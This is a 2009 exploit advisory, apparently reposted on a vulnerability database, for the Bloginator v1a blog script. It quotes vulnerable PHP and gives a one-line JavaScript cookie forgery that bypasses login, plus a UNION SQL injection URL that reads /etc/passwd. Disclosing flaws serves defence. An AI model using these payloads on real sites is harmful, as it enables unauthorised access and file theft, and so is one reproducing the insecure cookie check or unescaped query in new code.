Bloginator v1a (Cookie Bypass/SQL) Multiple Remote Vulnerabilities

🗓️ 20 Mar 2009 00:00:00Reported by RootType

Bloginator v1a (Cookie Bypass/SQL) Remote Vulnerabilitie


                                                ##########################################################################

Author = FireShot , Jacopo Vuga.
Mail = fireshot&lt;at&gt;autistici&lt;dot&gt;org

Software = Bloginator V1A
Download = http://kamads.com/kamads_ads/download.php?email=bloginator&amp;ID=0

Greets to = Osirys, Myral, str0ke

###########################################################################

Vulnerability = Insicure Cookie Handling

###########################################################################

[CODE]

[URL] www.site.com/bloginator/articleCall.php

global $name,$password,$returnLink;
$p_name = strip_tags(substr($_POST[\'name\'],0,32));
$p_password = strip_tags(substr($_POST[\'password\'],0,32));
if(crypt($p_name , $name) == $name and crypt($p_password,$password) == $password )
 {

           setcookie(\&quot;identifyYourself\&quot;,\&quot;you are identified\&quot;);
           print \&quot;Login successfull&lt;br&gt;\&quot;;
           print $returnLink;
       }
   else {print \&quot;Wrong username or password\&quot;;
   }
}

[/CODE]


[EXPLOIT]

javascript:document.cookie = \&quot;identifyYourself=you+are+identified; path=/\&quot;;

[/EXPLOIT]

############################################################################

Vulnerability = SQL injection

############################################################################

[CODE]

[URL] www.site.com/bloginator/articleCall.php

$action = @$_GET[\'action\'];
[...]
$id = $_GET[\'id\'];
[...]
function editArticle($id,$message)
{
global $returnLink;
$query = \&quot;select * FROM articles WHERE id=\'$id\'\&quot;;
$sql = mysql_query($query) or die(mysql_query());
$title = mysql_result($sql,0,\'title\');
$title = htmlentities($title);
$article = mysql_result($sql,0,\'article\');
$article = htmlentities($article);
$link = mysql_result($sql,0,\'link\');
$link = htmlentities($link);

startHTML(\&quot;Edit ID # \&quot;.$id);
?&gt;

[/CODE]

[EXPLOIT]

As Admin (Post Cookie exploit) you can inj arbitrary SQL code in the query.

www.site.com/action=edit&amp;id=fireshot\' union select 1,2,3,4,load_file(\'/etc/passwd\'),6,7 order by \'*

[/EXPLOIT]

##############################################################################

20 Mar 2009 00:00Current

7.1High risk

Vulners AI Score7.1